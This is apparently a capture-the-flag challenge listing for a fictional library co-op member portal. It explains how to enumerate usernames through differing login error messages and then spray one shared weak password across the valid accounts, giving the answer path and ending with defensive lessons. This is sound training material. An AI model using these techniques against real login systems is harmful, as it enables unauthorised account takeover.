Pinegrass Library Co-op
A small community library's member portal. The login form is quite clear about which mistakes you've made. The members, meanwhile, all share a password they were given in 2014.
The Scenario
Pinegrass has been a member-funded library co-op since 1962. The online portal was set up by Cyrus, the volunteer IT person, who picked a "temporary" password for every staff member's account so they could each log in once and change it. None of them did. The login form, separately, was written by a copy editor who made the error messages clearer than is good for them.
Challenge Intel
Synopsis
The login form returns different error messages for valid vs invalid member IDs (username enumeration). Every member account uses the same weak password — `password1`. Enumerate the roster, then spray that one password across all valid member IDs; every successful login lands on a dashboard that renders the flag.
What It Is
Two compounding flaws. (1) POST /login differentiates "Password incorrect for member {id}" (echoes the id back when the member exists) vs "We don't have a member by that name" (when it doesn't). The /about page lists 10 staff with full names; those map to seeded member accounts as firstinitial+lastname. (2) Every one of those 10 accounts shares the password `password1` — set by the IT volunteer as a "temporary default" in 2014 and never rotated. Sprays succeed on any enumerated account; the flag is rendered on every dashboard as the "Member reconciliation reference" row.
Who It's For
Players ready to combine two cheap techniques — username enumeration off the public site copy, then a password spray of one weak credential. No tooling required; curl is enough.
Skills You'll Practice
- Username enumeration via differential error messages
- Password spraying — one password across many accounts
- Treating public copy as the enumeration wordlist
What You'll Gain
- Login errors must not differentiate between 'unknown user' and 'wrong password'
- Shared / default passwords across an org are catastrophic — sprays land before any single account locks
- Per-account first-login resets are not optional
Ready to hack Pinegrass Library Co-op?
This challenge is free. Sign up and start hacking.